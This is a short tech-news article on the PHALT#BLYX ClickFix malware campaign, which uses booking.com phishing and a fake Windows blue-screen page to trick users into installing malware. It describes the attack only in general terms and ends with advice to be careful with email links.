This Fake Windows BSOD Is Actually A Malware Trap

Windows users will need to be a bit more cautious, as researchers at security firm Securonix have uncovered a new ClickFix malware campaign, dubbed PHALT#BLYX, targeting Microsoft’s operating system. The threat actors behind this campaign are leveraging several techniques to install malicious software, including displaying a fake blue screen of death (BSOD) error to deceive unsuspecting victims.

The attack begins when a potential victim receives a phishing e-mail purporting to be from booking.com regarding the cancellation of a reservation, which contains a link to a site that the attackers control. This site mimics what the legitimate booking.com site looks like to further lull targets into a false sense of security. These threat actors are likely attempting to take advantage of a busy time of year for travelers, as people are on the move for the holidays and events such as CES.


The next step of the attack is particularly devious, as the web page contains an error message that instructs users to refresh the page. However, performing the page refresh causes the browser to display a full screen message that mirrors a Windows BSOD (you know, those cryptic error messages that Microsoft's trying to make less cryptic). This fake blue screen contains steps that claim to "fix” the supposed error, when in reality they trick users into running a command that installs the malicious software.

Once installed, the malware takes steps to gain elevated privileges and establishes persistence so it can continue to work through reboots of the infected machine. It’s capable of logging keystrokes, recording a victim’s screen, and sending new executable files. Additionally, attackers can deploy a coinminer and put a victim’s machine to work on their behalf.

E-mail phishing continues to be a popular attack vector for threat actors, so users should exercise a little extra caution when receiving e-mails that contain links, lest they fall prey to devious attacks like this one.